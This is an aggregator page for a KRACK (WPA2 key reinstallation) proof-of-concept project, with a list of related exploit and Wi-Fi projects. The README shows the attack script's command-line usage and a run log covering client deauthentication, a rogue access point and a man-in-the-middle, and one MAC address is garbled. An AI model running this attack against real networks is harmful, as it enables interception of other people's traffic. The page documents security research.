GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → Hackndo → Krack Poc

Hackndo / Krack Poc

Krack POC

Programming Languages

python
139335 projects - #7 most used programming language

Labels

wifipoc

Projects that are alternatives of or similar to Krack Poc

Rtl88x2bu wifi linux v5.2.4.4 26334.20180126 coex20171012 5044
rtl88x2bu driver updated for modern kernels.
Stars: ✭ 55 (-36.05%)
Mutual labels:  wifi
Poc Bank
Focus on cybersecurity | collection of PoC and Exploits
Stars: ✭ 68 (-20.93%)
Mutual labels:  poc
Cve 2017 0781
Blueborne CVE-2017-0781 Android heap overflow vulnerability
Stars: ✭ 74 (-13.95%)
Mutual labels:  poc
Cve 2020 0796
CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost
Stars: ✭ 1,102 (+1181.4%)
Mutual labels:  poc
Hcxtools
Portable (that doesn't include proprietary/commercial operating systems) solution for conversion of cap/pcap/pcapng (gz compressed) WiFi dump files to hashcat formats (recommended by hashcat) and to John the Ripper formats. hcx: h = hash, c = convert and calculate candidates, x = different hashtypes
Stars: ✭ 1,121 (+1203.49%)
Mutual labels:  wifi
Sparkfun esp8266 at arduino library
WiFi and TCP drivers for an ESP8266 running AT firmware.
Stars: ✭ 68 (-20.93%)
Mutual labels:  wifi
Bleeper
Library to manage your firmware configurations written in C++
Stars: ✭ 54 (-37.21%)
Mutual labels:  wifi
Angelsword
Python3编写的CMS漏洞检测框架
Stars: ✭ 1,223 (+1322.09%)
Mutual labels:  poc
Blinker Library
An IoT Solution,Blinker library for embedded hardware. Works with Arduino, ESP8266, ESP32.
Stars: ✭ 1,095 (+1173.26%)
Mutual labels:  wifi
Ciscoexploit
Cisco Exploit (CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution/CVE-2019-1653/Cisco SNMP RCE/Dump Cisco RV320 Password)
Stars: ✭ 73 (-15.12%)
Mutual labels:  poc
Bitp0wn
Algorithms to re-compute a private key, to fake signatures and some other funny things with Bitcoin.
Stars: ✭ 59 (-31.4%)
Mutual labels:  poc
Iot camera
IoT Camera with Wi-Fi, RT-Thread
Stars: ✭ 62 (-27.91%)
Mutual labels:  wifi
Exploits
Miscellaneous exploit code
Stars: ✭ 1,157 (+1245.35%)
Mutual labels:  poc
Esp8266 deauther
Affordable WiFi hacking platform for testing and learning
Stars: ✭ 9,312 (+10727.91%)
Mutual labels:  wifi
Sming
Sming - Open Source framework for high efficiency native ESP8266 development
Stars: ✭ 1,197 (+1291.86%)
Mutual labels:  wifi
Ska
Simple Karma Attack
Stars: ✭ 55 (-36.05%)
Mutual labels:  wifi
Wifisuite
Enterprise WPA Wireless Tool Suite
Stars: ✭ 68 (-20.93%)
Mutual labels:  wifi
Esp8266 aliyun mqtt app
基于ESP8266官方SDK快速接入阿里云物联网平台
Stars: ✭ 81 (-5.81%)
Mutual labels:  wifi
Awesome Wifi Security
A collection of awesome resources related to 802.11 security, tools and other things
Stars: ✭ 79 (-8.14%)
Mutual labels:  wifi
Clickjacking Tester
A python script designed to check if the website if vulnerable of clickjacking and create a poc
Stars: ✭ 72 (-16.28%)
Mutual labels:  poc
View All Similar Projects ➔

[NO SUPPORT] PoC Krack (Key Reinstallation AttaCKs)

PLEASE READ : I have no intention to update or maintain this code. Feel free to use and modify it, but I won't answer to any comment/issue anymore. This project was difficult, I learnt what I wanted to learn, and developed what I wanted to develop, a quick-one-win to validate my comprehension of the vulnerability.

Proof of concept for Krack attack using channel-based MitM

Theory

French article on hackndo

Environment

WPA2 with CCMP

Usage

# ./Krack.py -h
usage: Krack.py [-h] [-d] -a ACCESS_POINT -i IFACE_AP -b CLIENT -j
                IFACE_CLIENT -c CHANNEL

optional arguments:
  -h, --help            show this help message and exit
  -d, --direct          Skip channel and monitor settings
  -a ACCESS_POINT, --access_point ACCESS_POINT
                        Enter the SSID of the specific access point to target
  -i IFACE_AP, --iface_ap IFACE_AP
                        Enter the SSID of the specific access point to target
  -b CLIENT, --client CLIENT
                        Enter the MAC address of the specific client to target
  -j IFACE_CLIENT, --iface_client IFACE_CLIENT
                        Enter the SSID of the specific access point to target
  -c CHANNEL, --channel CHANNEL
                        Choose channel on which the targeted access point is
                        listening on

# ./Krack.py -a hackndo_ssid_test -i wlan1 -b "ab💿0a:0b:11:22" -j wlan0 -c 11
[*] Turning off both interfaces
[*] Setting interface wlan1 on channel 11
[*] Interface wlan1 is on channel 11
[*] Setting interface wlan0 on channel 4
[*] Interface wlan0 is on channel 4
[*] Starting monitor mode for wlan1
[*] Interface wlan1 is now in monitor mode
[*] Starting monitor mode for wlan0
[*] Interface wlan0 is now in monitor mode
[*] Turning on both interfaces
[*] Trying to find hackndo_ssid_test MAC address
[*] MAC Found ! 0e:cc:46:8a:b1:09
[*] Jammer initialized correctly
[*] Sniffing an AP Beacon...
[*] AP Beacon saved!
[*] Sniffing an AP Probe response...
[*] AP Probe response saved!
[*] Updating wlan1 MAC address to ab💿0a:0b:11:22 (Client MAC)
[*] wlan1 MAC address update successful
[*] Updating wlan0 MAC address to 0e:cc:46:8a:b1:09 (Real AP MAC)
[*] wlan0 MAC address update successful
[*] Rogue AP started. Sending beacons...
[*] Running main loop
[*] Starting deauth on AP 0e:cc:46:8a:b1:09 (hackndo_ssid_test) and client ab💿0a:0b:11:22...
[*] Probe request to our AP
[*] Client authenticated to our AP!
[*] MitM attack has started
[*] Deauth stopped

TODO

  • [X] Use CSA (Channel Switch Announcement) to make client switch channel after deauth (See issue #1)
  • [ ] Save data sent by client
  • [ ] Break cryptography with known plain text when counter is reinitialized
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].